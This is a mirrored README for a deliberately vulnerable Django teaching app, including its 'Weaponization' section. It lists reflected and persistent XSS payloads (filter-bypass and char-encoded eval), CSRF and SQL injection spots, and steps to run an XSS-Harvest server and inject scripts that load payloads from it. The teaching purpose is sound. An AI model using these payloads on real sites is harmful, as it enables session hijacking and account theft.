GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Miserlou → Exploitable

Miserlou / Exploitable

Licence: other
A Django application full of security holes for instructional purposes

Programming Languages

javascript
184084 projects - #8 most used programming language
python
139335 projects - #7 most used programming language
shell
77523 projects

screenie

Exploitable

A Django application full of security holes for instructional purposes.

Cross Site Scripting (XSS)

In the 'Branch Finder', there is a reflective XSS, and in the profile page, there is a persistant XSS.

Reflective

"){}; }; alert("jello");  //

Persistant

<scrscriptipt>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 115, 109, 101, 108, 108, 111, 39, 41, 59))</scrscriptipt>

Resources

Cross Site Resource Forgery (CSRF)

Transfering Funds can be done as CSRF-unprotected GET request.

SQL Injection (SQLi)

Depositing funds can be used to deliver an SQL injection.

Resources

Weaponization

First, install XSS-Harvest: https://github.com/Miserlou/XSS-Harvest

Start Harvest Server

 ./xss-harvest.pl -l -p 9000 -r http://localhost:8000/accounts/signin/

Deliver Exploit Payload

<script src="http://localhost:9000/i"></script>

JavaScript Payload Delivery (with jQuery)

$.getScript("http://localhost:9000/i", function(){});

Char Encoded Payload Delivery

<script>eval(String.fromCharCode(36, 46, 103, 101, 116, 83, 99, 114, 105, 112, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 57, 48, 48, 48, 47, 105, 34, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 125, 41, 59));</script>
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].